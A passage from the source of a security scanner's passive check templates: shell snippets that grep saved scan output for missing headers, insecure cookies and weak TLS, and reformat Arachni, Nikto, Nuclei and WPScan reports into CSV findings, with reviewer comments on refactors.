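  SC0PE_HEADERS="$LOOT_DIR/web/headers-http-$TARGET.txt"
  SC0PE_VULN='Clickjacking HTTP'
else
  SC0PE_HEADERS="$LOOT_DIR/web/headers-https-$TARGET.txt"
  SC0PE_VULN='Clickjacking HTTPS'
fi
if [ -f "$SC0PE_HEADERS" ]; then
  AUTHOR='@xer0dayz'
  VULN_NAME="$SC0PE_VULN"
  FILENAME="$SC0PE_HEADERS"
  MATCH="x-frame-options"
  SEVERITY='P4 - LOW'
  GREP_OPTIONS='-i'
  SEARCH='negative'
  SECONDARY_COMMANDS=''
  URI=""
fi
--------------------------------------------------------------------------------
/templates/passive/web/Drupal_Detected.sh:
--------------------------------------------------------------------------------
# Passive web check: the X-Generator response header names Drupal.
AUTHOR='@xer0dayz'
VULN_NAME='Drupal Detected'
FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET-*.txt"
MATCH="X\-Generator\:\ Drupal\ "
SEVERITY='P5 - INFO'
GREP_OPTIONS='-i'
SEARCH='positive'
SECONDARY_COMMANDS=''
--------------------------------------------------------------------------------
/templates/passive/web/Expired_SSL_Certificate.sh:
--------------------------------------------------------------------------------
# Passive web check over curl's verbose output (case-sensitive on purpose).
AUTHOR='@xer0dayz'
VULN_NAME='Expired SSL Certificate'
FILENAME="$LOOT_DIR/web/curldebug-$TARGET-*.txt"
MATCH='certificate has expired'
SEVERITY='P3 - MEDIUM'
GREP_OPTIONS=''
SEARCH='positive'
SECONDARY_COMMANDS=''
--------------------------------------------------------------------------------
/templates/passive/web/Fortinet_FortiGate_SSL_VPN_Panel_Passive_Detection.sh:
--------------------------------------------------------------------------------
# Passive web check: the masked Server header value FortiGate portals send.
AUTHOR='@xer0dayz'
VULN_NAME='Fortinet FortiGate SSL VPN Panel Passive Detection'
FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET-*.txt"
MATCH="Server\:\ xxxxxxxx-xxxxx"
SEVERITY='P5 - INFO'
GREP_OPTIONS='-i'
SEARCH='positive'
SECONDARY_COMMANDS=''
--------------------------------------------------------------------------------
/templates/passive/web/Insecure_Cookie_-_HTTPOnly_Not_Set.sh:
--------------------------------------------------------------------------------
# Passive web check: Set-Cookie headers that do not carry the HttpOnly flag.
# NOTE(review): the secondary filter drops any line containing "httponly",
# so a cookie whose name contains that word is skipped too -- confirm.
AUTHOR='@xer0dayz'
VULN_NAME='Insecure Cookie - HTTPOnly Not Set'
FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET-*.txt"
MATCH='Set-Cookie'
SEVERITY='P3 - MEDIUM'
GREP_OPTIONS='-i'
SEARCH='positive'
SECONDARY_COMMANDS=' | egrep -iv httponly'
--------------------------------------------------------------------------------
/templates/passive/web/Insecure_Cookie_-_Secure_Not_Set.sh:
--------------------------------------------------------------------------------
# Passive web check: Set-Cookie headers that do not carry the Secure flag.
# NOTE(review): "-iv secure" also drops cookies whose name contains "secure".
AUTHOR='@xer0dayz'
VULN_NAME='Insecure Cookie - Secure Not Set'
FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET-*.txt"
MATCH='Set-Cookie'
SEVERITY='P3 - MEDIUM'
GREP_OPTIONS='-i'
SEARCH='positive'
SECONDARY_COMMANDS=' | egrep -iv secure'
--------------------------------------------------------------------------------
/templates/passive/web/Insecure_SSL_TLS_Connection.sh:
--------------------------------------------------------------------------------
# Passive web check over sslscan output for SSLv2/SSLv3 being offered.
AUTHOR='@xer0dayz'
VULN_NAME='Weak SSL TLS Protocols'
FILENAME="$LOOT_DIR/web/sslscan-$TARGET.txt $LOOT_DIR/web/sslscan-$TARGET-*.txt"
# The old pattern "SSLv* enabled" was a regex, not a glob: it required "SSL",
# any number of "v", then exactly " enabled", so "SSLv3     enabled" never
# matched.  This form assumes sslscan prints "SSLv<n>" padded with spaces
# before "enabled" -- confirm against a real loot file.
MATCH="SSLv[23] +enabled"
SEVERITY='P2 - HIGH'
GREP_OPTIONS='-i'
SEARCH='positive'
SECONDARY_COMMANDS=''
--------------------------------------------------------------------------------
/templates/passive/web/Insecure_SSL_TLS_Connection_CN_Mismatch.sh:
--------------------------------------------------------------------------------
# Passive web check: curl refused the certificate for the requested host name.
AUTHOR='@xer0dayz'
VULN_NAME='Insecure SSL TLS Connection CN Mismatch'
FILENAME="$LOOT_DIR/web/curldebug-$TARGET.txt"
MATCH='failed to verify the legitimacy of the server'
SEVERITY='P3 - MEDIUM'
GREP_OPTIONS='-i'
SEARCH='positive'
SECONDARY_COMMANDS=''
URI="/"
--------------------------------------------------------------------------------
/templates/passive/web/Interesting_Title_Found.sh:
--------------------------------------------------------------------------------
# Passive web check over the saved page titles.
AUTHOR='@xer0dayz'
VULN_NAME='Interesting Title Found'
FILENAME="$LOOT_DIR/web/title-htt*-$TARGET-*.txt"
MATCH='admin|dev|portal|login|sign|signup|registration|account'
SEVERITY='P5 - INFO'
GREP_OPTIONS='-i'
SEARCH='positive'
SECONDARY_COMMANDS=''
--------------------------------------------------------------------------------
/templates/passive/web/Server_Header_Disclosure.sh:
--------------------------------------------------------------------------------
# Passive web check for a Server header; only the finding name and the headers
# file depend on the scheme, the rest is shared.
if [ "$SSL" = "false" ]; then
  VULN_NAME='Server Header Disclosure - HTTP'
  FILENAME="$LOOT_DIR/web/headers-http-$TARGET-*.txt"
else
  VULN_NAME='Server Header Disclosure - HTTPS'
  FILENAME="$LOOT_DIR/web/headers-https-$TARGET-*.txt"
fi
AUTHOR='@xer0dayz'
MATCH="Server\:"
SEVERITY='P5 - INFO'
GREP_OPTIONS='-i'
SEARCH='positive'
SECONDARY_COMMANDS=''
--------------------------------------------------------------------------------
/templates/passive/web/Strict_Tranposrt_Security_Not_Enforced.sh:
--------------------------------------------------------------------------------
# Negative HSTS check, only meaningful for HTTPS; for plain-HTTP scans nothing
# is set, mirroring Clear-text_Communications_HTTP.sh.  The former "else break"
# is gone: if the runner sources templates inside a loop it cut that loop short
# for every non-SSL target, and outside a loop it was a no-op.
# NOTE(review): "Tranposrt" is kept because the file name and any output name
# derived from $VULN_NAME carry the same spelling.
if [ "$SSL" = "true" ]; then
  AUTHOR='@xer0dayz'
  VULN_NAME='Strict Tranposrt Security Not Enforced'
  FILENAME="$LOOT_DIR/web/headers-https-$TARGET.txt"
  MATCH="strict-transport-security"
  SEVERITY='P4 - LOW'
  GREP_OPTIONS='-i'
  SEARCH='negative'
  SECONDARY_COMMANDS=''
fi
--------------------------------------------------------------------------------
/templates/passive/web/Trace_Method_Enabled.sh:
--------------------------------------------------------------------------------
# Passive web check over the saved OPTIONS responses.
AUTHOR='@xer0dayz'
VULN_NAME='TRACE Method Enabled'
FILENAME="$LOOT_DIR/web/http_options-$TARGET-*.txt"
MATCH='TRACE'
SEVERITY='P4 - LOW'
GREP_OPTIONS='-i'
SEARCH='positive'
SECONDARY_COMMANDS=''
--------------------------------------------------------------------------------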
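/templates/passive/web/X-Powered-By_Header_Found.sh:
--------------------------------------------------------------------------------
# Passive web check over the saved response headers.
AUTHOR='@xer0dayz'
VULN_NAME='X-Powered-By Header Found'
FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET-*.txt"
MATCH='X-Powered-By'
SEVERITY='P5 - INFO'
GREP_OPTIONS='-i'
SEARCH='positive'
SECONDARY_COMMANDS=''
--------------------------------------------------------------------------------
/templates/passive/web/recursive/Arachni_Vulnerability_Scan.disabled:
--------------------------------------------------------------------------------
# Recursive template (presumably not picked up because of the .disabled
# extension -- confirm).  Turns an Arachni text report into sc0pe CSV lines:
# the kept lines are consumed in groups of four, the second of which carries
# the severity word.
AUTHOR='@xer0dayz'
VULN_NAME='Arachni Vulnerability Scan'
FILENAME="${LOOT_DIR}/web/arachni_webscan_${TARGET}_*.txt"
OUTPUT_NAME=$(echo "$VULN_NAME" | sed -E 's/[^[:alnum:]]+/_/g')
SC0PE_FILE="$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt"

rm -f "$SC0PE_FILE" 2> /dev/null
# Per-run scratch files: the fixed /tmp/out and /tmp/report.txt were shared by
# concurrent scans and writable by every local user.
SC0PE_TMP_OUT="$(mktemp -t sniper-arachni-out.XXXXXX)"
SC0PE_TMP_REPORT="$(mktemp -t sniper-arachni-report.XXXXXX)"

# Keep the Proof/URL/Severity/"[+] [" lines, escape "<" as &lt; so the value is
# safe inside an HTML report (the old "&lh;" is not an entity), and re-join
# words 3-15 of each line.  The former sed 's/\n//g' was a no-op and is gone.
cat $FILENAME 2> /dev/null \
  | grep -E 'Proof\:|URL\:|Severity\:|\[\+\]\ \[' \
  | sed -r 's/</\&lt;/g' \
  | awk '{ line = $3; for (i = 4; i <= 15; i++) line = line " " $i; print line }' 2> /dev/null \
  | tr -d '"' > "$SC0PE_TMP_OUT" 2> /dev/null

# DELETE FIRST LINE (presumably the report header, not a finding -- confirm)
sed -i '1d' "$SC0PE_TMP_OUT" 2> /dev/null

x=0
# read -r keeps backslashes in the evidence; printf avoids echo's option and
# escape handling.  Output bytes are otherwise the same as before.
while read -r line; do
  x=$(( x + 1 ))
  if [ "$x" -eq 1 ]; then
    printf '%s,' "$line" >> "$SC0PE_TMP_REPORT" 2> /dev/null
  elif [ "$x" -eq 2 ]; then
    # NOTE(review): an unrecognised severity word adds no column at all and
    # shifts the CSV fields of that finding; kept as in the original.
    if [[ $line =~ .*Critical.* ]]; then
      printf 'P1 - CRITICAL,' >> "$SC0PE_TMP_REPORT" 2> /dev/null
    elif [[ $line =~ .*High.* ]]; then
      printf 'P2 - HIGH,' >> "$SC0PE_TMP_REPORT" 2> /dev/null
    elif [[ $line =~ .*Medium.* ]]; then
      printf 'P3 - MEDIUM,' >> "$SC0PE_TMP_REPORT" 2> /dev/null
    elif [[ $line =~ .*Low.* ]]; then
      printf 'P4 - LOW,' >> "$SC0PE_TMP_REPORT" 2> /dev/null
    elif [[ $line =~ .*Informational.* ]]; then
      printf 'P5 - INFO,' >> "$SC0PE_TMP_REPORT" 2> /dev/null
    fi
  elif [ "$x" -eq 3 ]; then
    printf '%s,' "$line" >> "$SC0PE_TMP_REPORT" 2> /dev/null
  elif [ "$x" -eq 4 ]; then
    printf '%s\n' "$line" >> "$SC0PE_TMP_REPORT" 2> /dev/null
    x=0
  fi
done < "$SC0PE_TMP_OUT"
# Reorder to "severity, name, column 3, rest".
awk -F',' '{ rest = $4; for (i = 5; i <= 10; i++) rest = rest " " $i; print $2 ", " $1 ", " $3 ", " rest }' "$SC0PE_TMP_REPORT" 2> /dev/null >> "$SC0PE_FILE"
cat "$SC0PE_FILE" 2> /dev/null
rm -f "$SC0PE_TMP_OUT" "$SC0PE_TMP_REPORT" 2> /dev/null
--------------------------------------------------------------------------------
/templates/passive/web/recursive/Arachni_Vulnerability_Scan_-_HTTP.sh:
--------------------------------------------------------------------------------
# Recursive template: Arachni HTTP report -> sc0pe CSV.  Identical pipeline to
# Arachni_Vulnerability_Scan.disabled, only the input file differs.
AUTHOR='@xer0dayz'
VULN_NAME='Arachni Vulnerability Scan - HTTP'
FILENAME="$LOOT_DIR/web/arachni-$TARGET-webscan-http.txt"
OUTPUT_NAME=$(echo "$VULN_NAME" | sed -E 's/[^[:alnum:]]+/_/g')
SC0PE_FILE="$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt"

rm -f "$SC0PE_FILE" 2> /dev/null
# Per-run scratch files instead of the shared, world-writable /tmp paths.
SC0PE_TMP_OUT="$(mktemp -t sniper-arachni-out.XXXXXX)"
SC0PE_TMP_REPORT="$(mktemp -t sniper-arachni-report.XXXXXX)"

# Keep the Proof/URL/Severity/"[+] [" lines, escape "<" as &lt; (the old
# "&lh;" is not an entity) and re-join words 3-15 of each line.
cat $FILENAME 2> /dev/null \
  | grep -E 'Proof\:|URL\:|Severity\:|\[\+\]\ \[' \
  | sed -r 's/</\&lt;/g' \
  | awk '{ line = $3; for (i = 4; i <= 15; i++) line = line " " $i; print line }' 2> /dev/null \
  | tr -d '"' > "$SC0PE_TMP_OUT" 2> /dev/null

# DELETE FIRST LINE (presumably the report header -- confirm)
sed -i '1d' "$SC0PE_TMP_OUT" 2> /dev/null

x=0
# Groups of four lines; the second carries the severity word.
while read -r line; do
  x=$(( x + 1 ))
  if [ "$x" -eq 1 ]; then
    printf '%s,' "$line" >> "$SC0PE_TMP_REPORT" 2> /dev/null
  elif [ "$x" -eq 2 ]; then
    # NOTE(review): an unrecognised severity word adds no column (as before).
    if [[ $line =~ .*Critical.* ]]; then
      printf 'P1 - CRITICAL,' >> "$SC0PE_TMP_REPORT" 2> /dev/null
    elif [[ $line =~ .*High.* ]]; then
      printf 'P2 - HIGH,' >> "$SC0PE_TMP_REPORT" 2> /dev/null
    elif [[ $line =~ .*Medium.* ]]; then
      printf 'P3 - MEDIUM,' >> "$SC0PE_TMP_REPORT" 2> /dev/null
    elif [[ $line =~ .*Low.* ]]; then
      printf 'P4 - LOW,' >> "$SC0PE_TMP_REPORT" 2> /dev/null
    elif [[ $line =~ .*Informational.* ]]; then
      printf 'P5 - INFO,' >> "$SC0PE_TMP_REPORT" 2> /dev/null
    fi
  elif [ "$x" -eq 3 ]; then
    printf '%s,' "$line" >> "$SC0PE_TMP_REPORT" 2> /dev/null
  elif [ "$x" -eq 4 ]; then
    printf '%s\n' "$line" >> "$SC0PE_TMP_REPORT" 2> /dev/null
    x=0
  fi
done < "$SC0PE_TMP_OUT"
awk -F',' '{ rest = $4; for (i = 5; i <= 10; i++) rest = rest " " $i; print $2 ", " $1 ", " $3 ", " rest }' "$SC0PE_TMP_REPORT" 2> /dev/null >> "$SC0PE_FILE"
cat "$SC0PE_FILE" 2> /dev/null
rm -f "$SC0PE_TMP_OUT" "$SC0PE_TMP_REPORT" 2> /dev/null
--------------------------------------------------------------------------------
/templates/passive/web/recursive/Arachni_Vulnerability_Scan_-_HTTPS.sh:
--------------------------------------------------------------------------------
# Recursive template: Arachni HTTPS report -> sc0pe CSV.  Identical pipeline
# to the HTTP variant, only the input file differs.
AUTHOR='@xer0dayz'
VULN_NAME='Arachni Vulnerability Scan - HTTPS'
FILENAME="$LOOT_DIR/web/arachni-$TARGET-webscan-https.txt"
OUTPUT_NAME=$(echo "$VULN_NAME" | sed -E 's/[^[:alnum:]]+/_/g')
SC0PE_FILE="$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt"

rm -f "$SC0PE_FILE" 2> /dev/null
# Per-run scratch files instead of the shared, world-writable /tmp paths.
SC0PE_TMP_OUT="$(mktemp -t sniper-arachni-out.XXXXXX)"
SC0PE_TMP_REPORT="$(mktemp -t sniper-arachni-report.XXXXXX)"

# Keep the Proof/URL/Severity/"[+] [" lines, escape "<" as &lt; (the old
# "&lh;" is not an entity) and re-join words 3-15 of each line.
cat $FILENAME 2> /dev/null \
  | grep -E 'Proof\:|URL\:|Severity\:|\[\+\]\ \[' \
  | sed -r 's/</\&lt;/g' \
  | awk '{ line = $3; for (i = 4; i <= 15; i++) line = line " " $i; print line }' 2> /dev/null \
  | tr -d '"' > "$SC0PE_TMP_OUT" 2> /dev/null

# DELETE FIRST LINE (presumably the report header -- confirm)
sed -i '1d' "$SC0PE_TMP_OUT" 2> /dev/null

x=0
# Groups of four lines; the second carries the severity word.
while read -r line; do
  x=$(( x + 1 ))
  if [ "$x" -eq 1 ]; then
    printf '%s,' "$line" >> "$SC0PE_TMP_REPORT" 2> /dev/null
  elif [ "$x" -eq 2 ]; then
    # NOTE(review): an unrecognised severity word adds no column (as before).
    if [[ $line =~ .*Critical.* ]]; then
      printf 'P1 - CRITICAL,' >> "$SC0PE_TMP_REPORT" 2> /dev/null
    elif [[ $line =~ .*High.* ]]; then
      printf 'P2 - HIGH,' >> "$SC0PE_TMP_REPORT" 2> /dev/null
    elif [[ $line =~ .*Medium.* ]]; then
      printf 'P3 - MEDIUM,' >> "$SC0PE_TMP_REPORT" 2> /dev/null
    elif [[ $line =~ .*Low.* ]]; then
      printf 'P4 - LOW,' >> "$SC0PE_TMP_REPORT" 2> /dev/null
    elif [[ $line =~ .*Informational.* ]]; then
      printf 'P5 - INFO,' >> "$SC0PE_TMP_REPORT" 2> /dev/null
    fi
  elif [ "$x" -eq 3 ]; then
    printf '%s,' "$line" >> "$SC0PE_TMP_REPORT" 2> /dev/null
  elif [ "$x" -eq 4 ]; then
    printf '%s\n' "$line" >> "$SC0PE_TMP_REPORT" 2> /dev/null
    x=0
  fi
done < "$SC0PE_TMP_OUT"
awk -F',' '{ rest = $4; for (i = 5; i <= 10; i++) rest = rest " " $i; print $2 ", " $1 ", " $3 ", " rest }' "$SC0PE_TMP_REPORT" 2> /dev/null >> "$SC0PE_FILE"
cat "$SC0PE_FILE" 2> /dev/null
rm -f "$SC0PE_TMP_OUT" "$SC0PE_TMP_REPORT" 2> /dev/null
--------------------------------------------------------------------------------
/templates/passive/web/recursive/Nikto_Vulnerability_Scan-HTTP.sh:
--------------------------------------------------------------------------------
# Recursive template: every nikto "+ ..." line except the "Target" banner
# becomes one P4 finding whose evidence column is words 2-25 of the line.
AUTHOR='@xer0dayz'
VULN_NAME='Nikto Vulnerability Scan - HTTP'
FILENAME="$LOOT_DIR/web/nikto-$TARGET-http-port80.txt"
OUTPUT_NAME=$(echo "$VULN_NAME" | sed -E 's/[^[:alnum:]]+/_/g')
MATCH="\+"
GREP_OPTIONS='-ih'
SC0PE_FILE="$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt"

rm -f "$SC0PE_FILE" 2> /dev/null
# The target is printed straight from AWK_TARGET instead of the old
# "$50=AWK_TARGET" field-assignment trick; the output columns are unchanged.
grep -E "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null \
  | grep -v "Target\ " \
  | awk -v AWK_TARGET="$TARGET" 'AWK_TARGET != "" {
        detail = $2
        for (i = 3; i <= 25; i++) detail = detail " " $i
        print "P4 - LOW, Nikto Vulnerability Scan - HTTP, http://" AWK_TARGET ", " detail
    }' 2> /dev/null >> "$SC0PE_FILE"
cat "$SC0PE_FILE" 2> /dev/null
--------------------------------------------------------------------------------
/templates/passive/web/recursive/Nikto_Vulnerability_Scan-HTTPS.sh:
--------------------------------------------------------------------------------
# Recursive template, HTTPS twin of Nikto_Vulnerability_Scan-HTTP.sh.
AUTHOR='@xer0dayz'
VULN_NAME='Nikto Vulnerability Scan - HTTPS'
FILENAME="$LOOT_DIR/web/nikto-$TARGET-https-port443.txt"
OUTPUT_NAME=$(echo "$VULN_NAME" | sed -E 's/[^[:alnum:]]+/_/g')
MATCH="\+"
GREP_OPTIONS='-ih'
SC0PE_FILE="$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt"

rm -f "$SC0PE_FILE" 2> /dev/null
# The finding label and URL scheme now say HTTPS; the original copy still
# emitted "Nikto Vulnerability Scan - HTTP, http://" for the HTTPS scan.
grep -E "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null \
  | grep -v "Target\ " \
  | awk -v AWK_TARGET="$TARGET" 'AWK_TARGET != "" {
        detail = $2
        for (i = 3; i <= 25; i++) detail = detail " " $i
        print "P4 - LOW, Nikto Vulnerability Scan - HTTPS, https://" AWK_TARGET ", " detail
    }' 2> /dev/null >> "$SC0PE_FILE"
cat "$SC0PE_FILE" 2> /dev/null
--------------------------------------------------------------------------------
/templates/passive/web/recursive/Nuclei_Vulnerability_Scan_-_HTTP.sh:
--------------------------------------------------------------------------------
# Recursive template: nuclei findings -> sc0pe CSV, one pass per nuclei
# severity tag from critical down to info, so the result file keeps the order
# the original five copy-pasted pipelines produced.  Words 2-3 of a nuclei
# line are skipped and words 4-25 are re-joined as the evidence column.
AUTHOR='@xer0dayz'
VULN_NAME='Nuclei Vulnerability Scan - HTTP'
FILENAME="$LOOT_DIR/web/nuclei-http-$TARGET-port*.txt"
OUTPUT_NAME=$(echo "$VULN_NAME" | sed -E 's/[^[:alnum:]]+/_/g')
GREP_OPTIONS='-ih'
SC0PE_FILE="$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt"

rm -f "$SC0PE_FILE" 2> /dev/null
while IFS=: read -r SC0PE_LEVEL SC0PE_PRIORITY; do
  # $MATCH is still set per pass (last value "\[info\]", as before).
  MATCH="\[$SC0PE_LEVEL\]"
  grep -E "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null \
    | awk -v AWK_TARGET="$TARGET" -v PRIORITY="$SC0PE_PRIORITY" 'AWK_TARGET != "" {
          detail = $4
          for (i = 5; i <= 25; i++) detail = detail " " $i
          print PRIORITY ", Nuclei Vulnerability Scan, " $1 ", " detail
      }' 2> /dev/null >> "$SC0PE_FILE"
done <<'EOF'
critical:P1 - CRITICAL
high:P2 - HIGH
medium:P3 - MEDIUM
low:P4 - LOW
info:P5 - INFO
EOF

cat "$SC0PE_FILE" 2> /dev/null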
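--------------------------------------------------------------------------------
/templates/passive/web/recursive/Nuclei_Vulnerability_Scan_-_HTTPS.sh:
--------------------------------------------------------------------------------
# Recursive template: nuclei findings -> sc0pe CSV, one pass per nuclei
# severity tag from critical down to info (same order as the original five
# copy-pasted pipelines).  Words 2-3 of a nuclei line are skipped and words
# 4-25 are re-joined as the evidence column.
AUTHOR='@xer0dayz'
VULN_NAME='Nuclei Vulnerability Scan - HTTPS'
FILENAME="$LOOT_DIR/web/nuclei-https-$TARGET-port*.txt"
OUTPUT_NAME=$(echo "$VULN_NAME" | sed -E 's/[^[:alnum:]]+/_/g')
GREP_OPTIONS='-ih'
SC0PE_FILE="$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt"

rm -f "$SC0PE_FILE" 2> /dev/null
while IFS=: read -r SC0PE_LEVEL SC0PE_PRIORITY; do
  # $MATCH is still set per pass (last value "\[info\]", as before).
  MATCH="\[$SC0PE_LEVEL\]"
  grep -E "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null \
    | awk -v AWK_TARGET="$TARGET" -v PRIORITY="$SC0PE_PRIORITY" 'AWK_TARGET != "" {
          detail = $4
          for (i = 5; i <= 25; i++) detail = detail " " $i
          print PRIORITY ", Nuclei Vulnerability Scan, " $1 ", " detail
      }' 2> /dev/null >> "$SC0PE_FILE"
done <<'EOF'
critical:P1 - CRITICAL
high:P2 - HIGH
medium:P3 - MEDIUM
low:P4 - LOW
info:P5 - INFO
EOF

cat "$SC0PE_FILE" 2> /dev/null
--------------------------------------------------------------------------------
/templates/passive/web/recursive/Wordpress_Vulnerability_Scan_-_HTTPS_1.sh:
--------------------------------------------------------------------------------
# Recursive template: wpscan "Title:" lines become P3 findings, "[+]" lines
# P5 findings.  The target is printed from AWK_TARGET instead of the old
# "$50=AWK_TARGET" trick; output columns are unchanged.
# NOTE(review): after "cut -d: -f2" the awk print starts at $2, so the first
# word after "Title:" is dropped from the evidence -- confirm that is intended.
AUTHOR='@xer0dayz'
VULN_NAME='Wordpress Vulnerability Scan - HTTPS 1'
FILENAME="$LOOT_DIR/web/wpscan-$TARGET-https-port443a.txt"
OUTPUT_NAME=$(echo "$VULN_NAME" | sed -E 's/[^[:alnum:]]+/_/g')
MATCH="Title\:"
GREP_OPTIONS='-ih'
SC0PE_FILE="$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt"

rm -f "$SC0PE_FILE" 2> /dev/null
grep -E "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null \
  | cut -d\: -f2 2> /dev/null \
  | awk -v AWK_TARGET="$TARGET" 'AWK_TARGET != "" {
        detail = $2
        for (i = 3; i <= 25; i++) detail = detail " " $i
        print "P3 - MEDIUM, Wordpress Vulnerability Scan - HTTPS, https://" AWK_TARGET ", " detail
    }' 2> /dev/null >> "$SC0PE_FILE"
MATCH="[+]"
grep -E "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null \
  | awk -v AWK_TARGET="$TARGET" 'AWK_TARGET != "" {
        detail = $2
        for (i = 3; i <= 25; i++) detail = detail " " $i
        print "P5 - INFO, Wordpress Vulnerability Scan - HTTPS, https://" AWK_TARGET ", " detail
    }' 2> /dev/null >> "$SC0PE_FILE"
cat "$SC0PE_FILE" 2> /dev/null
--------------------------------------------------------------------------------
/templates/passive/web/recursive/Wordpress_Vulnerability_Scan_-_HTTPS_2.sh:
--------------------------------------------------------------------------------
# Second HTTPS wpscan output file; same pipeline as the _1 template.
AUTHOR='@xer0dayz'
VULN_NAME='Wordpress Vulnerability Scan - HTTPS 2'
FILENAME="$LOOT_DIR/web/wpscan-$TARGET-https-port443b.txt"
OUTPUT_NAME=$(echo "$VULN_NAME" | sed -E 's/[^[:alnum:]]+/_/g')
MATCH="Title\:"
GREP_OPTIONS='-ih'
SC0PE_FILE="$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt"

rm -f "$SC0PE_FILE" 2> /dev/null
grep -E "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null \
  | cut -d\: -f2 2> /dev/null \
  | awk -v AWK_TARGET="$TARGET" 'AWK_TARGET != "" {
        detail = $2
        for (i = 3; i <= 25; i++) detail = detail " " $i
        print "P3 - MEDIUM, Wordpress Vulnerability Scan - HTTPS, https://" AWK_TARGET ", " detail
    }' 2> /dev/null >> "$SC0PE_FILE"
MATCH="[+]"
grep -E "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null \
  | awk -v AWK_TARGET="$TARGET" 'AWK_TARGET != "" {
        detail = $2
        for (i = 3; i <= 25; i++) detail = detail " " $i
        print "P5 - INFO, Wordpress Vulnerability Scan - HTTPS, https://" AWK_TARGET ", " detail
    }' 2> /dev/null >> "$SC0PE_FILE"
cat "$SC0PE_FILE" 2> /dev/null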
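--------------------------------------------------------------------------------
/templates/passive/web/recursive/Wordpress_Vulnerability_Scan_-_HTTP_1.sh:
--------------------------------------------------------------------------------
AUTHOR='@xer0dayz'
VULN_NAME='Wordpress Vulnerability Scan - HTTP 1'
# Input: the wpscan report for this target over HTTP (the "port80a" run); presumably
# written by an earlier scan stage — this template only parses it.
FILENAME="$LOOT_DIR/web/wpscan-$TARGET-http-port80a.txt"
# Collapse every run of non-alphanumerics in VULN_NAME to "_" so it is safe as a filename component.
OUTPUT_NAME=$(echo "$VULN_NAME" | sed -E 's/[^[:alnum:]]+/_/g')
MATCH="Title\:"
GREP_OPTIONS='-ih'

# NOTE(review): TARGET is interpolated into the output path. Quoting prevents word splitting
# and globbing, but nothing here validates its contents — confirm the caller does.
rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null

# "Title:" lines are reported as P3. cut keeps the text after the first ":"; the awk pattern
# "$50=AWK_TARGET" is an assignment, so it is true for any non-empty target and stores the
# target in field 50 for the URL column. Field 1 is intentionally not printed.
grep -E "$GREP_OPTIONS" "$MATCH" "$FILENAME" 2> /dev/null | cut -d\: -f2 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P3 - MEDIUM, Wordpress Vulnerability Scan - HTTP, http://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10 " " $11 " " $12 " " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' >> "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null

# "[+]" lines are reported as P5 (informational); field 1 (typically the "[+]" marker) is dropped.
MATCH="[+]"
grep -E "$GREP_OPTIONS" "$MATCH" "$FILENAME" 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P5 - INFO, Wordpress Vulnerability Scan - HTTP, http://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10 " " $11 " " $12 " " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' >> "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null

# Print the collected findings for this template.
cat "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null
--------------------------------------------------------------------------------
/templates/passive/web/recursive/Wordpress_Vulnerability_Scan_-_HTTP_2.sh:
--------------------------------------------------------------------------------
AUTHOR='@xer0dayz'
VULN_NAME='Wordpress Vulnerability Scan - HTTP 2'
# Input: the wpscan report for this target over HTTP (the "port80b" run); presumably
# written by an earlier scan stage — this template only parses it.
FILENAME="$LOOT_DIR/web/wpscan-$TARGET-http-port80b.txt"
# Collapse every run of non-alphanumerics in VULN_NAME to "_" so it is safe as a filename component.
OUTPUT_NAME=$(echo "$VULN_NAME" | sed -E 's/[^[:alnum:]]+/_/g')
MATCH="Title\:"
GREP_OPTIONS='-ih'

# NOTE(review): TARGET is interpolated into the output path. Quoting prevents word splitting
# and globbing, but nothing here validates its contents — confirm the caller does.
rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null

# "Title:" lines are reported as P3. cut keeps the text after the first ":"; the awk pattern
# "$50=AWK_TARGET" is an assignment, so it is true for any non-empty target and stores the
# target in field 50 for the URL column. Field 1 is intentionally not printed.
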